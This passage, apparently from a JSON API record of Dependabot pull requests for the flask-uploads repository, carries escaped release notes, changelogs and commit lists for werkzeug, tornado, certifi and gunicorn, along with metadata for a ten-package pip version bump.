3.13.\n\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2926\"\u003e#2926\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth works when the URL already contains a query string.\n\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2918\"\u003e#2918\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.3\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.3 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.3/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.3/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3\"\u003ehttps://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/werkzeug/milestone/35?closed=1\"\u003ehttps://github.com/pallets/werkzeug/milestone/35?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eOnly allow \u003ccode\u003elocalhost\u003c/code\u003e, \u003ccode\u003e.localhost\u003c/code\u003e, \u003ccode\u003e127.0.0.1\u003c/code\u003e, or the specified hostname when running the dev server, to make debugger requests. Additional hosts can be added by using the debugger middleware directly. The debugger UI makes requests using the full URL rather than only the path. GHSA-2g68-c3qc-8985\u003c/li\u003e\n\u003cli\u003eMake reloader more robust when \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e is in \u003ccode\u003esys.path\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2823\"\u003e#2823\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/werkzeug/blob/main/CHANGES.rst\"\u003ewerkzeug's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.0.6\u003c/h2\u003e\n\u003cp\u003eReleased 2024-10-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix how \u003ccode\u003emax_form_memory_size\u003c/code\u003e is applied when parsing large non-file\nfields. :ghsa:\u003ccode\u003eq34m-jh98-gwm2\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esafe_join\u003c/code\u003e catches certain paths on Windows that were not caught by\n\u003ccode\u003entpath.isabs\u003c/code\u003e on Python \u0026lt; 3.11. :ghsa:\u003ccode\u003ef9vj-2wh5-fj8j\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.0.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-10-24\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe Watchdog reloader ignores file closed no write events. :issue:\u003ccode\u003e2945\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eLogging works with client addresses containing an IPv6 scope :issue:\u003ccode\u003e2952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eIgnore invalid authorization parameters. :issue:\u003ccode\u003e2955\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove type annotation fore \u003ccode\u003eSharedDataMiddleware\u003c/code\u003e. :issue:\u003ccode\u003e2958\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCompatibility with Python 3.13 when generating debugger pin and the current\nUID does not have an associated name. :issue:\u003ccode\u003e2957\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.0.4\u003c/h2\u003e\n\u003cp\u003eReleased 2024-08-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestore behavior where parsing \u003ccode\u003emultipart/x-www-form-urlencoded\u003c/code\u003e data with\ninvalid UTF-8 bytes in the body results in no form data parsed rather than a\n413 error. :issue:\u003ccode\u003e2930\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove \u003ccode\u003eparse_options_header\u003c/code\u003e performance when parsing unterminated\nquoted string values. :issue:\u003ccode\u003e2904\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth is synchronized across threads/processes when tracking\nfailed entries. :issue:\u003ccode\u003e2916\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDev server handles unexpected \u003ccode\u003eSSLEOFError\u003c/code\u003e due to issue in Python \u0026lt; 3.13.\n:issue:\u003ccode\u003e2926\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth works when the URL already contains a query string.\n:issue:\u003ccode\u003e2918\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.0.3\u003c/h2\u003e\n\u003cp\u003eReleased 2024-05-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eOnly allow \u003ccode\u003elocalhost\u003c/code\u003e, \u003ccode\u003e.localhost\u003c/code\u003e, \u003ccode\u003e127.0.0.1\u003c/code\u003e, or the specified\nhostname when running the dev server, to make debugger requests. Additional\nhosts can be added by using the debugger middleware directly. The debugger\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/5eaefc3996aa5cc8c5237d8b82f1b89eed6ea624\"\u003e\u003ccode\u003e5eaefc3\u003c/code\u003e\u003c/a\u003e release version 3.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/2767bcb10a7dd1c297d812cc5e6d11a474c1f092\"\u003e\u003ccode\u003e2767bcb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/87cc78a25f782f8c59fbde786840a00cf0d09b3d\"\u003e\u003ccode\u003e87cc78a\u003c/code\u003e\u003c/a\u003e catch special absolute path on Windows Python \u0026lt; 3.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b\"\u003e\u003ccode\u003e50cfeeb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/8760275afb72bd10b57d92cb4d52abf759b2f3a7\"\u003e\u003ccode\u003e8760275\u003c/code\u003e\u003c/a\u003e apply max_form_memory_size another level up in the parser\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/8d6a12e2af542a553853c870d106884a3cd1f73b\"\u003e\u003ccode\u003e8d6a12e\u003c/code\u003e\u003c/a\u003e start version 3.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/a7b121abc781b9a6557ca204f23247db654d0253\"\u003e\u003ccode\u003ea7b121a\u003c/code\u003e\u003c/a\u003e release version 3.0.5 (\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2961\"\u003e#2961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/9caf72ac060181a3171d91fd12279e071df430ca\"\u003e\u003ccode\u003e9caf72a\u003c/code\u003e\u003c/a\u003e release version 3.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/e28a2451e99457ce71e460af276a02f27a3bdba1\"\u003e\u003ccode\u003ee28a245\u003c/code\u003e\u003c/a\u003e catch OSError from getpass.getuser (\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2960\"\u003e#2960\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/e6b4cce97eef17716004625bcf6754fa930f2618\"\u003e\u003ccode\u003ee6b4cce\u003c/code\u003e\u003c/a\u003e catch OSError from getpass.getuser\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/werkzeug/compare/0.8.3...3.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tornado` from 2.3 to 6.5\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tornadoweb/tornado/blob/master/docs/releases.rst\"\u003etornado's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease notes\u003c/h1\u003e\n\u003cp\u003e.. toctree::\n:maxdepth: 2\u003c/p\u003e\n\u003cp\u003ereleases/v6.5.1\nreleases/v6.5.0\nreleases/v6.4.2\nreleases/v6.4.1\nreleases/v6.4.0\nreleases/v6.3.3\nreleases/v6.3.2\nreleases/v6.3.1\nreleases/v6.3.0\nreleases/v6.2.0\nreleases/v6.1.0\nreleases/v6.0.4\nreleases/v6.0.3\nreleases/v6.0.2\nreleases/v6.0.1\nreleases/v6.0.0\nreleases/v5.1.1\nreleases/v5.1.0\nreleases/v5.0.2\nreleases/v5.0.1\nreleases/v5.0.0\nreleases/v4.5.3\nreleases/v4.5.2\nreleases/v4.5.1\nreleases/v4.5.0\nreleases/v4.4.3\nreleases/v4.4.2\nreleases/v4.4.1\nreleases/v4.4.0\nreleases/v4.3.0\nreleases/v4.2.1\nreleases/v4.2.0\nreleases/v4.1.0\nreleases/v4.0.2\nreleases/v4.0.1\nreleases/v4.0.0\nreleases/v3.2.2\nreleases/v3.2.1\nreleases/v3.2.0\nreleases/v3.1.1\nreleases/v3.1.0\nreleases/v3.0.2\nreleases/v3.0.1\nreleases/v3.0.0\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/ab5f35431242f95a5ef0a2ac228e54e89ab511f0\"\u003e\u003ccode\u003eab5f354\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3498\"\u003e#3498\u003c/a\u003e from bdarnell/final-6.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/3623024dfc36ea4955ba06c41dd1e63487e65473\"\u003e\u003ccode\u003e3623024\u003c/code\u003e\u003c/a\u003e Final release notes for 6.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/b39b892bf78fe8fea01dd45199aa88307e7162f3\"\u003e\u003ccode\u003eb39b892\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3497\"\u003e#3497\u003c/a\u003e from bdarnell/multipart-log-spam\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/cc61050e8f26697463142d99864b562e8470b41d\"\u003e\u003ccode\u003ecc61050\u003c/code\u003e\u003c/a\u003e httputil: Raise errors instead of logging in multipart/form-data parsing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/ae4a4e4feafc631c3dba64c3fbe185d05c37e356\"\u003e\u003ccode\u003eae4a4e4\u003c/code\u003e\u003c/a\u003e asyncio: Preserve contextvars across SelectorThread on Windows (\u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3479\"\u003e#3479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/197ff13f768b9abd26b0ecb97989bdd40283c345\"\u003e\u003ccode\u003e197ff13\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3496\"\u003e#3496\u003c/a\u003e from bdarnell/undeprecate-set-event-loop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/c3d906c4ad05c2719f9e9c7a1f103e925b4bbc3a\"\u003e\u003ccode\u003ec3d906c\u003c/code\u003e\u003c/a\u003e requirements: Upgrade tox to 4.26.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/a83897732e1b3f52406930448604c236d5dfbf64\"\u003e\u003ccode\u003ea838977\u003c/code\u003e\u003c/a\u003e testing: Remove deprecation warning filter for set_event_loop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/d8e0d36ebad1a042866a9355959e99e0bf90a3c0\"\u003e\u003ccode\u003ed8e0d36\u003c/code\u003e\u003c/a\u003e build: Fix free-threaded build, mark speedups module as no-GIL\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/bfe748948581fff5fef41d6297bcf5baf6915dd6\"\u003e\u003ccode\u003ebfe7489\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3492\"\u003e#3492\u003c/a\u003e from bdarnell/relnotes-6.5\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tornadoweb/tornado/compare/v2.3.0...v6.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/xqliu/flask-uploads/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/xqliu/flask-uploads/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/xqliu%2Fflask-uploads/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-07-09T17:44:21.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2653577153","node_id":"PR_kwDOHkKvz86eKl_B","number":1,"state":"open","title":"Bump the pip group across 1 directory with 10 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-07-09T17:44:21.000Z","updated_at":"2025-07-09T17:44:22.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":10,"packages":[{"name":"certifi","old_version":"2020.6.20","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"gunicorn","old_version":"20.0.4","new_version":"23.0.0","repository_url":"https://github.com/benoitc/gunicorn"},{"name":"idna","old_version":"2.10","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"pillow","old_version":"8.2.0","new_version":"10.3.0","repository_url":"https://github.com/python-pillow/Pillow"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.24.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"sqlparse","old_version":"0.3.1","new_version":"0.5.0","repository_url":"https://github.com/andialbrecht/sqlparse"},{"name":"urllib3","old_version":"1.26.5","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"zipp","old_version":"3.3.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"},{"name":"celery","old_version":"4.1.0","new_version":"5.5.3","repository_url":"https://github.com/celery/celery"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 10 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.6.20` | `2024.7.4` |\n| [gunicorn](https://github.com/benoitc/gunicorn) | `20.0.4` | `23.0.0` |\n| [idna](https://github.com/kjd/idna) | `2.10` | `3.7` |\n| [pillow](https://github.com/python-pillow/Pillow) | `8.2.0` | `10.3.0` |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.24.0` | `2.32.4` |\n| [sqlparse](https://github.com/andialbrecht/sqlparse) | `0.3.1` | `0.5.0` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.26.5` | `2.5.0` |\n| [zipp](https://github.com/jaraco/zipp) | `3.3.0` | `3.19.1` |\n| [celery](https://github.com/celery/celery) | `4.1.0` | `5.5.3` |\n\n\nUpdates `certifi` from 2020.6.20 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.06.20...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gunicorn` from 20.0.4 to 23.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/benoitc/gunicorn/releases\"\u003egunicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e23.0.0\u003c/h2\u003e\n\u003cp\u003eGunicorn 23.0.0 has been released. This version improve HTTP 1.1. support and  which improve safety\u003c/p\u003e\n\u003cp\u003eYou're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003ch1\u003e23.0.0 - 2024-08-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eminor docs fixes (:pr:\u003ccode\u003e3217\u003c/code\u003e, :pr:\u003ccode\u003e3089\u003c/code\u003e, :pr:\u003ccode\u003e3167\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eworker_class parameter accepts a class (:pr:\u003ccode\u003e3079\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003efix deadlock if request terminated during chunked parsing (:pr:\u003ccode\u003e2688\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit receiving Transfer-Encodings: compress, deflate, gzip (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit Transfer-Encoding headers specifying multiple encodings. note: no parameters, still (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003esdist generation now explicitly excludes sphinx build folder (:pr:\u003ccode\u003e3257\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003edecode bytes-typed status (as can be passed by gevent) as utf-8 instead of raising \u003ccode\u003eTypeError\u003c/code\u003e (:pr:\u003ccode\u003e2336\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eraise correct Exception when encounting invalid chunked requests (:pr:\u003ccode\u003e3258\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003ethe SCRIPT_NAME and PATH_INFO headers, when received from allowed forwarders, are no longer restricted for containing an underscore (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003einclude IPv6 loopback address \u003ccode\u003e[::1]\u003c/code\u003e in default for :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e and :ref:\u003ccode\u003eproxy-allow-ips\u003c/code\u003e (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** NOTE **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SCRIPT_NAME change mitigates a regression that appeared first in the 22.0.0 release\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e setting if you are still not seeing the SCRIPT_NAME transmitted\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarder-headers\u003c/code\u003e setting if you are missing headers after upgrading from a version prior to 22.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** Breaking changes **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefuse requests where the uri field is empty (:pr:\u003ccode\u003e3255\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003erefuse requests with invalid CR/LR/NUL in heade field values (:pr:\u003ccode\u003e3253\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eremove temporary \u003ccode\u003e--tolerate-dangerous-framing\u003c/code\u003e switch from 22.0 (:pr:\u003ccode\u003e3260\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eIf any of the breaking changes affect you, be aware that now refused requests can post a security problem, especially so in setups involving request pipe-lining and/or proxies.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFix CVE-2024-1135\u003c/p\u003e\n\u003ch2\u003eGunicorn 22.0 has been released\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eGunicorn 22.0.0 has been released.\u003c/strong\u003e This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003cp\u003eChanges:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e22.0.0 - 2024-04-17\n===================\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003eutime\u003c/code\u003e to notify workers liveness\u003c/li\u003e\n\u003cli\u003emigrate setup to pyproject.toml\u003c/li\u003e\n\u003cli\u003efix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)\u003c/li\u003e\n\u003cli\u003eparsing additional requests is no longer attempted past unsupported request framing\u003c/li\u003e\n\u003cli\u003eon HTTP versions \u0026lt; 1.1 support for chunked transfer is refused (only used in exploits)\u003c/li\u003e\n\u003cli\u003erequests conflicting configured or passed SCRIPT_NAME now produce a verbose error\u003c/li\u003e\n\u003cli\u003eTrailer fields are no longer inspected for headers indicating secure scheme\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/411986d6191114dd1d1bbb9c72c948dbf0ef0425\"\u003e\u003ccode\u003e411986d\u003c/code\u003e\u003c/a\u003e fix doc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/334392e7795f2017e83f7054d372422512d6f4b6\"\u003e\u003ccode\u003e334392e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2559\"\u003e#2559\u003c/a\u003e from laggardkernel/bugfix/reexec-env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/e75c3533e32f91a9dceba9e8e1341fea5540ba81\"\u003e\u003ccode\u003ee75c353\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3189\"\u003e#3189\u003c/a\u003e from pajod/patch-py36\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/9357b28dd867950e33ca3864207cb35a1eb8ba6f\"\u003e\u003ccode\u003e9357b28\u003c/code\u003e\u003c/a\u003e keep document user in access_log_format setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/79fdef0822cbfe7e16b659b07230af9be098d5fc\"\u003e\u003ccode\u003e79fdef0\u003c/code\u003e\u003c/a\u003e bump to 23.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca 